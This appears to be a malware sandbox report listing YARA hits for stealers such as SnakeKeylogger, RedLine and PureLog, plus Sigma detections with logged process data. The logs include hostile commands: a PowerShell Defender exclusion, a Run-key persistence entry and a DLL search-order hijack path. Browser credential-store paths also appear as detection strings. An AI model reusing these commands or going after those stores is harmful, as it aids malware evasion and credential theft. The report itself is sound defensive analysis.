7.2.rpkhzpuO.pif.26b1cfc0.11.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
7.2.rpkhzpuO.pif.26b1cfc0.11.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
7.2.rpkhzpuO.pif.26b1cfc0.11.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x101cd:$a1: get_encryptedPassword 0x283fd:$a1: get_encryptedPassword 0x4061d:$a1: get_encryptedPassword 0x10509:$a2: get_encryptedUsername 0x28739:$a2: get_encryptedUsername 0x40959:$a2: get_encryptedUsername 0xff5a:$a3: get_timePasswordChanged 0x2818a:$a3: get_timePasswordChanged 0x403aa:$a3: get_timePasswordChanged 0x1007b:$a4: get_passwordField 0x282ab:$a4: get_passwordField 0x404cb:$a4: get_passwordField 0x101e3:$a5: set_encryptedPassword 0x28413:$a5: set_encryptedPassword 0x40633:$a5: set_encryptedPassword 0x11bb3:$a7: get_logins 0x29de3:$a7: get_logins 0x42003:$a7: get_logins 0x11864:$a8: GetOutlookPasswords 0x29a94:$a8: GetOutlookPasswords 0x41cb4:$a8: GetOutlookPasswords
7.2.rpkhzpuO.pif.26b1cfc0.11.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x15423:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x2d653:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x45873:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x14921:$a3: \Google\Chrome\User Data\Default\Login Data 0x2cb51:$a3: \Google\Chrome\User Data\Default\Login Data 0x44d71:$a3: \Google\Chrome\User Data\Default\Login Data 0x14c2f:$a4: \Orbitum\User Data\Default\Login Data 0x2ce5f:$a4: \Orbitum\User Data\Default\Login Data 0x4507f:$a4: \Orbitum\User Data\Default\Login Data 0x15a27:$a5: \Kometa\User Data\Default\Login Data 0x2dc57:$a5: \Kometa\User Data\Default\Login Data 0x45e77:$a5: \Kometa\User Data\Default\Login Data
7.2.rpkhzpuO.pif.257b3f56.6.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
18.2.rpkhzpuO.pif.1eb96478.10.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
23.2.rpkhzpuO.pif.2f066478.8.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
18.2.rpkhzpuO.pif.1d813f56.4.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
7.2.rpkhzpuO.pif.26b351f0.10.raw.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
7.2.rpkhzpuO.pif.26b351f0.10.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
7.2.rpkhzpuO.pif.26b351f0.10.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
7.2.rpkhzpuO.pif.26b351f0.10.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x101cd:$a1: get_encryptedPassword 0x283ed:$a1: get_encryptedPassword 0x10509:$a2: get_encryptedUsername 0x28729:$a2: get_encryptedUsername 0xff5a:$a3: get_timePasswordChanged 0x2817a:$a3: get_timePasswordChanged 0x1007b:$a4: get_passwordField 0x2829b:$a4: get_passwordField 0x101e3:$a5: set_encryptedPassword 0x28403:$a5: set_encryptedPassword 0x11bb3:$a7: get_logins 0x29dd3:$a7: get_logins 0x11864:$a8: GetOutlookPasswords 0x29a84:$a8: GetOutlookPasswords 0x11642:$a9: StartKeylogger 0x29862:$a9: StartKeylogger 0x11b03:$a10: KeyLoggerEventArgs 0x29d23:$a10: KeyLoggerEventArgs 0x1169f:$a11: KeyLoggerEventArgsEventHandler 0x298bf:$a11: KeyLoggerEventArgsEventHandler
23.1.rpkhzpuO.pif.400000.2.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 BD 88 44 24 2B 88 44 24 2F B0 48 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
7.2.rpkhzpuO.pif.26b351f0.10.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x15423:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x2d643:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x14921:$a3: \Google\Chrome\User Data\Default\Login Data 0x2cb41:$a3: \Google\Chrome\User Data\Default\Login Data 0x14c2f:$a4: \Orbitum\User Data\Default\Login Data 0x2ce4f:$a4: \Orbitum\User Data\Default\Login Data 0x15a27:$a5: \Kometa\User Data\Default\Login Data 0x2dc47:$a5: \Kometa\User Data\Default\Login Data
7.2.rpkhzpuO.pif.1350008.1.raw.unpack	JoeSecurity_DBatLoader	Yara detected DBatLoader	Joe Security
7.2.rpkhzpuO.pif.27f00f08.17.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
7.2.rpkhzpuO.pif.28640000.18.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
7.2.rpkhzpuO.pif.26ac3d90.15.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
7.2.rpkhzpuO.pif.27f00000.16.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
7.2.rpkhzpuO.pif.27f00f08.17.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
7.2.rpkhzpuO.pif.26b351f0.10.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
7.2.rpkhzpuO.pif.26b351f0.10.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
7.2.rpkhzpuO.pif.26b351f0.10.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
7.2.rpkhzpuO.pif.26b351f0.10.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xe3cd:$a1: get_encryptedPassword 0xe709:$a2: get_encryptedUsername 0xe15a:$a3: get_timePasswordChanged 0xe27b:$a4: get_passwordField 0xe3e3:$a5: set_encryptedPassword 0xfdb3:$a7: get_logins 0xfa64:$a8: GetOutlookPasswords 0xf842:$a9: StartKeylogger 0xfd03:$a10: KeyLoggerEventArgs 0xf89f:$a11: KeyLoggerEventArgsEventHandler
7.2.rpkhzpuO.pif.26b351f0.10.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x13623:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x12b21:$a3: \Google\Chrome\User Data\Default\Login Data 0x12e2f:$a4: \Orbitum\User Data\Default\Login Data 0x13c27:$a5: \Kometa\User Data\Default\Login Data
23.2.rpkhzpuO.pif.2f0a3d90.10.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
18.2.rpkhzpuO.pif.1d814e5e.3.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
7.2.rpkhzpuO.pif.28640000.18.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
7.2.rpkhzpuO.pif.257b3f56.6.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
18.1.rpkhzpuO.pif.400000.0.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 BD 88 44 24 2B 88 44 24 2F B0 48 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
9.0.Microsofts.exe.b70000.0.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
9.0.Microsofts.exe.b70000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
9.0.Microsofts.exe.b70000.0.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
9.0.Microsofts.exe.b70000.0.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x101cd:$a1: get_encryptedPassword 0x10509:$a2: get_encryptedUsername 0xff5a:$a3: get_timePasswordChanged 0x1007b:$a4: get_passwordField 0x101e3:$a5: set_encryptedPassword 0x11bb3:$a7: get_logins 0x11864:$a8: GetOutlookPasswords 0x11642:$a9: StartKeylogger 0x11b03:$a10: KeyLoggerEventArgs 0x1169f:$a11: KeyLoggerEventArgsEventHandler
9.0.Microsofts.exe.b70000.0.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x15423:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x14921:$a3: \Google\Chrome\User Data\Default\Login Data 0x14c2f:$a4: \Orbitum\User Data\Default\Login Data 0x15a27:$a5: \Kometa\User Data\Default\Login Data
18.2.rpkhzpuO.pif.200d0f08.13.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
23.2.rpkhzpuO.pif.400000.2.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 BD 88 44 24 2B 88 44 24 2F B0 48 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
7.2.rpkhzpuO.pif.26b4d410.14.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
7.2.rpkhzpuO.pif.26b4d410.14.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
7.2.rpkhzpuO.pif.26b4d410.14.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
7.2.rpkhzpuO.pif.26b4d410.14.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xe3cd:$a1: get_encryptedPassword 0xe709:$a2: get_encryptedUsername 0xe15a:$a3: get_timePasswordChanged 0xe27b:$a4: get_passwordField 0xe3e3:$a5: set_encryptedPassword 0xfdb3:$a7: get_logins 0xfa64:$a8: GetOutlookPasswords 0xf842:$a9: StartKeylogger 0xfd03:$a10: KeyLoggerEventArgs 0xf89f:$a11: KeyLoggerEventArgsEventHandler
7.2.rpkhzpuO.pif.26b4d410.14.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x13623:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x12b21:$a3: \Google\Chrome\User Data\Default\Login Data 0x12e2f:$a4: \Orbitum\User Data\Default\Login Data 0x13c27:$a5: \Kometa\User Data\Default\Login Data
7.2.rpkhzpuO.pif.400000.2.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 BD 88 44 24 2B 88 44 24 2F B0 48 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
7.2.rpkhzpuO.pif.27f00000.16.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
23.2.rpkhzpuO.pif.30c70000.13.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
23.2.rpkhzpuO.pif.30c70000.13.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
18.2.rpkhzpuO.pif.400000.2.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 BD 88 44 24 2B 88 44 24 2F B0 48 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
18.2.rpkhzpuO.pif.200d0000.12.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
23.2.rpkhzpuO.pif.2de54e5e.3.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
7.3.rpkhzpuO.pif.23be07b8.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
18.2.rpkhzpuO.pif.400000.2.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 BD 88 44 24 2B 88 44 24 2F B0 48 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
23.2.rpkhzpuO.pif.30640000.12.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
7.2.rpkhzpuO.pif.26a85570.12.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
7.2.rpkhzpuO.pif.26b4d410.14.raw.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
7.2.rpkhzpuO.pif.26b4d410.14.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
7.2.rpkhzpuO.pif.26b4d410.14.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
7.2.rpkhzpuO.pif.26b4d410.14.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x101cd:$a1: get_encryptedPassword 0x10509:$a2: get_encryptedUsername 0xff5a:$a3: get_timePasswordChanged 0x1007b:$a4: get_passwordField 0x101e3:$a5: set_encryptedPassword 0x11bb3:$a7: get_logins 0x11864:$a8: GetOutlookPasswords 0x11642:$a9: StartKeylogger 0x11b03:$a10: KeyLoggerEventArgs 0x1169f:$a11: KeyLoggerEventArgsEventHandler
7.2.rpkhzpuO.pif.26b4d410.14.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x15423:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x14921:$a3: \Google\Chrome\User Data\Default\Login Data 0x14c2f:$a4: \Orbitum\User Data\Default\Login Data 0x15a27:$a5: \Kometa\User Data\Default\Login Data
18.2.rpkhzpuO.pif.1eb95570.8.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
7.1.rpkhzpuO.pif.1350008.3.unpack	JoeSecurity_DBatLoader	Yara detected DBatLoader	Joe Security
18.2.rpkhzpuO.pif.200d0000.12.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
7.2.rpkhzpuO.pif.1350008.1.unpack	JoeSecurity_DBatLoader	Yara detected DBatLoader	Joe Security
4.2.x.exe.27c0000.2.unpack	JoeSecurity_DBatLoader	Yara detected DBatLoader	Joe Security
23.2.rpkhzpuO.pif.400000.2.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 BD 88 44 24 2B 88 44 24 2F B0 48 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
18.1.rpkhzpuO.pif.400000.0.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 BD 88 44 24 2B 88 44 24 2F B0 48 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
23.2.rpkhzpuO.pif.2f065570.9.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
4.2.x.exe.22a65a8.0.unpack	JoeSecurity_DBatLoader	Yara detected DBatLoader	Joe Security
7.2.rpkhzpuO.pif.257b4e5e.5.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
18.2.rpkhzpuO.pif.1d814e5e.3.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
23.2.rpkhzpuO.pif.30640f08.11.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
7.1.rpkhzpuO.pif.400000.2.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 BD 88 44 24 2B 88 44 24 2F B0 48 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
7.2.rpkhzpuO.pif.26b1cfc0.11.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
7.2.rpkhzpuO.pif.26b1cfc0.11.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
7.2.rpkhzpuO.pif.26b1cfc0.11.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
7.2.rpkhzpuO.pif.26b1cfc0.11.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xe3cd:$a1: get_encryptedPassword 0xe709:$a2: get_encryptedUsername 0xe15a:$a3: get_timePasswordChanged 0xe27b:$a4: get_passwordField 0xe3e3:$a5: set_encryptedPassword 0xfdb3:$a7: get_logins 0xfa64:$a8: GetOutlookPasswords 0xf842:$a9: StartKeylogger 0xfd03:$a10: KeyLoggerEventArgs 0xf89f:$a11: KeyLoggerEventArgsEventHandler
7.2.rpkhzpuO.pif.26b1cfc0.11.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x13623:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x12b21:$a3: \Google\Chrome\User Data\Default\Login Data 0x12e2f:$a4: \Orbitum\User Data\Default\Login Data 0x13c27:$a5: \Kometa\User Data\Default\Login Data
18.2.rpkhzpuO.pif.200d0f08.13.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
18.2.rpkhzpuO.pif.1ffd0000.11.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
23.2.rpkhzpuO.pif.2f066478.8.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
4.2.x.exe.22a65a8.0.raw.unpack	JoeSecurity_DBatLoader	Yara detected DBatLoader	Joe Security
7.2.rpkhzpuO.pif.26a86478.13.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
7.2.rpkhzpuO.pif.26a85570.12.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
Click to see the 99 entries

Sigma Signatures

System Summary

Sigma detected: DLL Search Order Hijackig Via Additional Space in Path

Source: File created

Author: frack113, Nasreddine Bencherchali: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\x.exe, ProcessId: 2788, TargetFilename: C:\Windows \SysWOW64\NETUTILS.dll

Sigma detected: Execution from Suspicious Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: C:\Users\Public\Libraries\rpkhzpuO.pif, CommandLine: C:\Users\Public\Libraries\rpkhzpuO.pif, CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\rpkhzpuO.pif, NewProcessName: C:\Users\Public\Libraries\rpkhzpuO.pif, OriginalFileName: C:\Users\Public\Libraries\rpkhzpuO.pif, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\x.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\x.exe, ParentProcessId: 2788, ParentProcessName: x.exe, ProcessCommandLine: C:\Users\Public\Libraries\rpkhzpuO.pif, ProcessId: 6480, ProcessName: rpkhzpuO.pif

Sigma detected: Files With System Process Name In Unsuspected Locations

Source: File created

Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\x.exe, ProcessId: 2788, TargetFilename: C:\Windows \SysWOW64\svchost.exe

Sigma detected: New RUN Key Pointing to Suspicious Folder

Source: Registry Key set

Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\Public\Oupzhkpr.url, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\x.exe, ProcessId: 2788, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Oupzhkpr

Sigma detected: Parent in Public Folder Suspicious Process

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd, CommandLine: C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\Public\Libraries\Oupzhkpr.PIF" , ParentImage: C:\Users\Public\Libraries\Oupzhkpr.PIF, ParentProcessId: 4824, ParentProcessName: Oupzhkpr.PIF, ProcessCommandLine: C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd, ProcessId: 1784, ProcessName: cmd.exe

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe, ParentProcessId: 2920, ParentProcessName: Trading_AIBot.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , ProcessId: 1600, ProcessName: powershell.exe

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\Public\Oupzhkpr.url, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\x.exe, ProcessId: 2788, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Oupzhkpr

Sigma detected: Execution of Suspicious File Type Extension

Source: Process started

Author: Max Altgelt (Nextron Systems): Data: Command: C:\Users\Public\Libraries\rpkhzpuO.pif, CommandLine: C:\Users\Public\Libraries\rpkhzpuO.pif, CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\rpkhzpuO.pif, NewProcessName: C:\Users\Public\Libraries\rpkhzpuO.pif, OriginalFileName: C:\Users\Public\Libraries\rpkhzpuO.pif, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\x.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\x.exe, ParentProcessId: 2788, ParentProcessName: x.exe, ProcessCommandLine: C:\Users\Public\Libraries\rpkhzpuO.pif, ProcessId: 6480, ProcessName: rpkhzpuO.pif

